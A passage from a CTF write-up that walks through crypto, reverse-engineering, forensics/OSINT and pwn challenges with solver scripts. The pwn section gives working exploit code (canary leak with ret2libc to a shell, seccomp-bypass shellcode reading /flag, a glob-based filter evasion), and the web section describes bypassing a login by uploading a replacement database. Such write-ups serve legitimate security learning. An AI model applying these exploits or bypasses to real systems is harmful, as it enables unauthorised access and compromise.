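    s = rot13(plaintext)
    for _ in range(rounds):
        s = base64.b32encode(s[::-1].encode()).decode()
    return rot13(s)


if __name__ == "__main__":
    sample = encode_layers("flag{constructed_sample}")   # constructed, not the challenge data
    print(len(sample), decode_layers(sample))
```

Two details make the chain work at all: rot13 only touches letters, so it commutes with base32's padding and digits, and base32 decoding is strict about padding, which is why each layer has to be reversed before the next decode rather than after.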
flag{flagishere}
crypto2
Ciphertext (JSFuck: the whole program is built from `[]`, `!`, `+` and `()`):
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[
]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()(([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[+[]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+([][[]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[!+[]+!+[]]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])
[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[+[]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]]+[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+
!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+([+[]]+![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]])
Run it as JavaScript (browser console or node) and it prints the flag. It is arbitrary code, so evaluate unknown JSFuck in a throwaway environment, not in a logged-in browser session.
flag{3e858ccd79287cfe8509f15a71b4c45d}
来道一元积分吧 (How about a single-variable integral?)
The challenge gives a Word document; solve the integral inside it to get a=2.
That opens the "encoded" archive.
Inside is this encoded string:
RMbpoP9B1wmOMH8kLz9P0ml(I3v=
Run it through this script:
import base64
# the string to encode
data = "RMbpoP9B1wmOMH8kLz9P0ml(I3v="
# as bytes
data_bytes = data.encode('utf-8')
# Base85-encode it with the base64 module
encoded_bytes = base64.b85encode(data_bytes)
# back to a string
encoded_str = encoded_bytes.decode('utf-8')
print(f"Encoded Base85: {encoded_str}")
# Encoded Base85: QcYrTZ%{cxF?VfGO-MLvOnNy`Fl}roNi%jm
That output is the password for the flag archive.
flag{I_LOVE_susu}
reverse
jeb
Open the APK in JEB, find MainActivity and start the analysis there.
package com.example.crackme;
import android.app.Activity;
import android.os.Bundle;
import android.view.Menu;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.Toast;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
/* loaded from: classes.dex */
public class MainActivity extends Activity {
private Button btn_register;
private EditText edit_sn;
String edit_userName;
@Override // android.app.Activity
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
setTitle(R.string.unregister);
this.edit_userName = "Tenshine";
this.edit_sn = (EditText) findViewById(R.id.edit_sn);
this.btn_register = (Button) findViewById(R.id.button_register);
this.btn_register.setOnClickListener(new View.OnClickListener() { // from class: com.example.crackme.MainActivity.1
@Override // android.view.View.OnClickListener
public void onClick(View v) {
if (!MainActivity.this.checkSN(MainActivity.this.edit_userName.trim(), MainActivity.this.edit_sn.getText().toString().trim())) {
Toast.makeText(MainActivity.this, (int) R.string.unsuccessed, 0).show();
return;
}
Toast.makeText(MainActivity.this, (int) R.string.successed, 0).show();
MainActivity.this.btn_register.setEnabled(false);
MainActivity.this.setTitle(R.string.registered);
}
});
}
@Override // android.app.Activity
public boolean onCreateOptionsMenu(Menu menu) {
getMenuInflater().inflate(R.menu.activity_main, menu);
return true;
}
/* JADX INFO: Access modifiers changed from: private */
public boolean checkSN(String userName, String sn) {
if (userName != null) {
try {
if (userName.length() == 0 || sn == null || sn.length() != 22) {
return false;
}
MessageDigest digest = MessageDigest.getInstance("MD5");
digest.reset();
digest.update(userName.getBytes());
byte[] bytes = digest.digest();
String hexstr = toHexString(bytes, "");
StringBuilder sb = new StringBuilder();
for (int i = 0; i < hexstr.length(); i += 2) {
sb.append(hexstr.charAt(i));
}
String userSN = sb.toString();
return new StringBuilder().append("flag{").append(userSN).append("}").toString().equalsIgnoreCase(sn);
} catch (NoSuchAlgorithmException e) {
e.printStackTrace();
return false;
}
}
return false;
}
private static String toHexString(byte[] bytes, String separator) {
StringBuilder hexString = new StringBuilder();
for (byte b : bytes) {
String hex = Integer.toHexString(b & 255);
if (hex.length() == 1) {
hexString.append('0');
}
hexString.append(hex).append(separator);
}
return hexString.toString();
}
}
So what sits inside flag{} is userSN, and the whole flag{...} string is the serial number the app expects,
with a length of 22 (flag{ + 16 characters + }).
The username is MD5-hashed,
byte[] bytes = digest.digest(); the digest is hex-encoded and only every second character is kept, i.e. the first hex digit (high nibble) of each byte.
So we first need the username, and the code hardcodes it:
this.edit_userName = "Tenshine"
MD5 it,
hex-encode the digest and keep the first hex digit of each byte:
import hashlib
def generate_sn(userName):
    # MD5 of the username as a 32-character hex string
    md5_hash = hashlib.md5(userName.encode()).hexdigest()
    # keep the first of every two characters (the high nibble of each byte)
    userSN = ''.join([md5_hash[i] for i in range(0, len(md5_hash), 2)])
    # wrap it in flag{}
    return f"flag{{{userSN}}}"
# the hardcoded username "Tenshine"
userName = "Tenshine"
sn = generate_sn(userName)
print("generated serial:", sn)
# 生成的序列号: flag{bc72f242a6af3857}
re1
(sign-in)
Open it in IDA and the flag is right there.
flag{7ujm8ikhy6}
shuangyuCTF-Baidu
Open the challenge.
It's a web page.
Digging through it, the CSS contains an AES ciphertext together with its key.
Decrypt it.
Type the recovered password the_ultimate_password123 into the Baidu-style search box.
It responds.
Follow the link to download the attachment:
http://sec.54cto.com/password_checker
It's UPX-packed; unpack it:
upx -d <file>
From main, the assembly leads to showflag, which holds the check logic:
unsigned __int64 __fastcall showflag(const char *a1)
{
int i; // [rsp+1Ch] [rbp-24h]
_WORD v3[12]; // [rsp+20h] [rbp-20h] BYREF
unsigned __int64 v4; // [rsp+38h] [rbp-8h]
v4 = __readfsqword(0x28u);
strcpy((char *)v3, "fneg儂mzsj_}o厞_唹悏}");
v3[11] = 0;
for ( i = 0; i <= 20; ++i )
{
if ( i + (i ^ (unsigned __int8)a1[i]) != *((unsigned __int8 *)v3 + i) )
{
puts("error");
return __readfsqword(0x28u) ^ v4;
}
}
printf("Good. Your input is flag: %s\n", a1);
return __readfsqword(0x28u) ^ v4;
}
Assembly of the same function:
.text:0000000000400607 ; =============== S U B R O U T I N E =======================================
.text:0000000000400607
.text:0000000000400607 ; Attributes: bp-based frame
.text:0000000000400607
.text:0000000000400607 ; unsigned __int64 __fastcall showflag(const char *)
.text:0000000000400607 public showflag
.text:0000000000400607 showflag proc near ; CODE XREF: .text:0000000000400741↓p
.text:0000000000400607
.text:0000000000400607 var_38 = qword ptr -38h
.text:0000000000400607 var_24 = dword ptr -24h
.text:0000000000400607 var_20 = byte ptr -20h
.text:0000000000400607 var_8 = qword ptr -8
.text:0000000000400607
.text:0000000000400607 ; __unwind {
.text:0000000000400607 push rbp
.text:0000000000400608 mov rbp, rsp
.text:000000000040060B sub rsp, 40h
.text:000000000040060F mov [rbp+var_38], rdi
.text:0000000000400613 mov rax, fs:28h
.text:000000000040061C mov [rbp+var_8], rax
.text:0000000000400620 xor eax, eax
.text:0000000000400622 mov qword ptr [rbp+var_20], 0
.text:000000000040062A mov qword ptr [rbp+var_20+8], 0
.text:0000000000400632 mov qword ptr [rbp+var_20+10h], 0
.text:000000000040063A mov [rbp+var_20], 66h ; 'f'
.text:000000000040063E mov [rbp+var_20+1], 6Eh ; 'n'
.text:0000000000400642 mov [rbp+var_20+2], 65h ; 'e'
.text:0000000000400646 mov [rbp+var_20+3], 67h ; 'g'
.text:000000000040064A mov [rbp+var_20+4], 83h
.text:000000000040064E mov [rbp+var_20+5], 7Ah ; 'z'
.text:0000000000400652 mov [rbp+var_20+6], 6Dh ; 'm'
.text:0000000000400656 mov [rbp+var_20+7], 7Ah ; 'z'
.text:000000000040065A mov [rbp+var_20+8], 73h ; 's'
.text:000000000040065E mov [rbp+var_20+9], 6Ah ; 'j'
.text:0000000000400662 mov [rbp+var_20+0Ah], 5Fh ; '_'
.text:0000000000400666 mov [rbp+var_20+0Bh], 7Dh ; '}'
.text:000000000040066A mov [rbp+var_20+0Ch], 6Fh ; 'o'
.text:000000000040066E mov [rbp+var_20+0Dh], 85h
.text:0000000000400672 mov [rbp+var_20+0Eh], 8Ah
.text:0000000000400676 mov [rbp+var_20+0Fh], 5Fh ; '_'
.text:000000000040067A mov [rbp+var_20+10h], 86h
.text:000000000040067E mov [rbp+var_20+11h], 89h
.text:0000000000400682 mov [rbp+var_20+12h], 90h
.text:0000000000400686 mov [rbp+var_20+13h], 89h
.text:000000000040068A mov [rbp+var_20+14h], 7Dh ; '}'
.text:000000000040068E mov [rbp+var_24], 0
.text:0000000000400695 jmp short loc_4006D7
.text:0000000000400697 ; ---------------------------------------------------------------------------
(The odd CJK characters in the decompiled strcpy are just IDA rendering the bytes 0x83, 0x85 0x8A and 0x86 0x89 0x90 0x89 as multibyte text; the mov instructions above show the real byte values.)
写解密脚本
def reverse_flag():
    # the 21 target bytes, taken from the mov instructions into var_20 .. var_20+14h
    v3 = [
        0x66, 0x6E, 0x65, 0x67, 0x83, 0x7A, 0x6D, 0x7A,  # var_20
        0x73, 0x6A, 0x5F, 0x7D, 0x6F, 0x85, 0x8A, 0x5F,  # var_20+8
        0x86, 0x89, 0x90, 0x89, 0x7D                     # var_20+10h
    ]
    flag = []
    for i in range(len(v3)):
        # the check is i + (i ^ a1[i]) == v3[i], so a1[i] = i ^ (v3[i] - i)
        a1_char = chr(i ^ (v3[i] - i))
        # keep printable ASCII, otherwise mark the position
        if 32 <= ord(a1_char) <= 126:
            flag.append(a1_char)
        else:
            flag.append('?')  # non-printable: something is off with that byte
    # return the recovered flag{} string
    return ''.join(flag)
# print the recovered flag
print(reverse_flag())
# flag{patch_your_file}
pyc
Open the challenge.
It's a PyInstaller-built Python executable; unpack it with pyinstxtractor.py,
then decompile the pyc with uncompyle6 (1.pyc here).
That gives the check logic:
# uncompyle6 version 3.9.1
# Python bytecode version base 3.7.0 (3394)
# Decompiled from: Python 3.9.13 (tags/v3.9.13:6de2ca5, May 17 2022, 16:36:42) [MSC v.1929 64 bit (AMD64)]
# Embedded file name: 1.py
def check():
a = input("plz input your flag:")
c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152,
78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53,
152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
if len(a) != 42:
print("wrong length")
return 0
b = 179
for i in range(len(a)):
if ord(a[i]) * 33 % b != c[i]:
print("wrong")
return
print("win")
check()
With the whole check known, write the inverse: each character c satisfies c * 33 mod 179 == target, so multiply by the inverse of 33 modulo 179.
def mod_inverse(a, m):
    """Modular inverse via the extended Euclidean algorithm (pow(a, -1, m) does the same on Python 3.8+)."""
    m0, x0, x1 = m, 0, 1
    if m == 1:
        return 0
    while a > 1:
        q = a // m
        m, a = a % m, m
        x0, x1 = x1 - q * x0, x0
    if x1 < 0:
        x1 += m0
    return x1
def reverse_check():
    c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152,
         78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53,
         152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
    b = 179
    inv_33 = mod_inverse(33, b)  # 179 is prime, so 33 is invertible
    a = ""
    for i in range(len(c)):
        # ord(a[i]) * 33 % 179 == c[i]  =>  ord(a[i]) == c[i] * inv_33 % 179
        ord_a = (c[i] * inv_33) % b
        a += chr(ord_a)
    print(f"recovered string: {a}")
reverse_check()
# recovered string: flag{2889e7a3-0d6b-4cbb-b6e9-04c0f26c9dca}
forensics
签到 (Sign-in)
flag{nsdf-wwsfmx-poermgg-sdfkwas}
好吃的可乐 (Tasty cola)
Address: 福建省福州市鼓楼区杨桥东路15-1号
base64 of the address: 56aP5bu655yB56aP5bee5biC6byT5qW85Yy65p2o5qGl5Lic6LevMTUtMeWPtw==
flag{56aP5bu655yB56aP5bee5biC6byT5qW85Yy65p2o5qGl5Lic6LevMTUtMeWPtw==}
shuangyuCTF-白小鱼
Open the pcap.
Following the hint ("inside the inside"), get to the website.
A quick look: it needs a username and password to log in.
No idea at first; then the page source shows the commented-out upload code. Uncomment it, intercept the request and upload.
(I wanted to upload a webshell, then found the backend is Python...)
The approach: upload a database.db that replaces the original database.
Export one, name it database.db, and upload it.
Once it's uploaded, log in with the password set in that database.
china
Reverse image search finds the place directly.
flag{台湾省台中市海天桥}
Canada
Google nearly killed me 😭
Finally located it: 蒙特利尔, 魁北克省 - Google 地图
45.4396221,-73.6501553
truncated to three decimals: 45.439,73.650
md5(45.439,73.650)
flag{e8e5a0a3a214bc2e393ad9aeb5aaecbb}
image
One picture; looking closely, a utility pole carries the text 元町312.
Search for it on Google Maps:
Yamate hondori - Google 地图
35.435846,139.645113
35.435,139.645
md5(35.435,139.645)
flag{7a0a192c47ae21cbfb4d0b03dc842316}
The last challenge
PWN
真*签到 (the real sign-in)
After connecting with nc, a lot of characters turn out to be filtered.
Use shell glob patterns such as /???/??? ????
(`?` matches any single character, so the command path and its argument can be spelled without any of the banned letters.)
Reference: 2023届的信安大挑战——pwn(更新不了一点,远端打不了力) - Falling_Dusk - 博客园 (cnblogs.com)
pwn签到
Decompile the binary and look around.
Check the protections.
Plan: leak the canary, then ret2libc.
No libc is supplied, so LibcSearcher is used to identify it from the leaked puts address.
from pwn import *
from LibcSearcher import *
context(log_level='debug')
def duan():            # drop into gdb when debugging locally
    gdb.attach(p)
    pause()
file = './signin'
# libcf= './libc.so.6'
#p=process(file)
p = remote('ctf.54cto.com',50899)
elf=ELF(file)
# libc=ELF(libcf)
plt = elf.plt['puts']
got = elf.got['puts']
main = elf.sym['main']
rdi = 0x40071e          # pop rdi ; ret gadget
ret = 0x400596          # ret gadget, keeps the stack 16-byte aligned before system()
binsh = 0x600CF0
# input 1: the name. input 2: fill the 24 bytes in front of the canary; sendline's '\n'
# overwrites the canary's zero low byte, so the echo that follows prints the whole canary
p.recvuntil('name:')
p.sendline(b'/bin/sh')
#duan()
p.sendline(b'a'*24)
canary = u64(p.recvuntil(b'\x50')[-9::][:-1:]) - 0x0a   # undo the 0x0a that replaced the low byte
print(hex(canary))
log.success('canary is '+hex(canary))
# input 3: ret2plt, puts(puts@got) leaks a libc address, then return to main for a second round
payload1 = b'a'*(0x20-8) + p64(canary) + p64(1) + p64(rdi)+p64(got)+p64(plt)+p64(main)
p.sendline(payload1)
real_add = u64(p.recvuntil(b'\x7f')[-6::].ljust(8,b'\x00'))   # leaked puts address
log.success(f'real is {hex(real_add)}')
#base = real_add - libc.sym['puts']
#system = base + libc.sym['system']
#libsh = base + next(libc.search(b'/bin/sh\x00'))
libc = LibcSearcher('puts',real_add)   # identify the remote libc from the leaked symbol
base = real_add - libc.dump('puts')
system = base + libc.dump('system')
libsh = base + libc.dump('str_bin_sh')
log.success('canary is '+hex(canary))
log.success(f'system is {hex(system)}')
#log.success(f'libsh is {hex(libsh)}')
# second round: same canary (the process was not re-executed), now call system("/bin/sh")
payload2 = b'a'*(0x20-8) + p64(canary) + p64(1)
payload2 += p64(ret)
payload2 += p64(rdi)
payload2 += p64(libsh)
payload2 += p64(system)
p.recvuntil('name:')
p.sendline(b'/bin/sh')
p.sendline(b'a')
p.recvuntil(b'Say something: ')
p.sendline(payload2)
p.interactive() #0xed0e313bf32c2700
There are three inputs per run: the first leaks the canary, the second leaks the puts address, and the third runs system("/bin/sh") to read the flag.
flag{159854c2-d757-4ed2-a3ab-a61317985c2c}
ez_sandbox
Decompile it and look at main.
Check the protections.
main reads shellcode and jumps to it, but a seccomp filter is installed.
Check whether open/read/write (ORW) is possible:
read, write, open and execve are blocked.
seccomp filters match on syscall numbers, so a blacklist is dodged with the equivalents it forgot: openat instead of open, and sendfile to copy the file straight to stdout without read or write (the mmap in the shellcode below maps the file too, but sendfile does the copying on its own).
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
file='./sandbox'
#p=process(file)
p=remote('ctf.54cto.com',50865)
elf=ELF(file)
shellcode=shellcraft.openat(0,'/flag',0)                 # openat(2) instead of the filtered open(2); returns fd 3
shellcode+=shellcraft.mmap(0x10000,0x100,1,1,'eax',0)    # map the file read-only (eax = the fd just returned)
shellcode+=shellcraft.sendfile(1,3,0,0x100)              # copy fd 3 to stdout without read/write
shellcode=asm(shellcode)
p.sendlineafter('input shellcode: \n',shellcode)
p.interactive()
Run it and the flag comes back.
flag{69d45d54-b2a5-4e00-b29a-0d2ea3ae0952}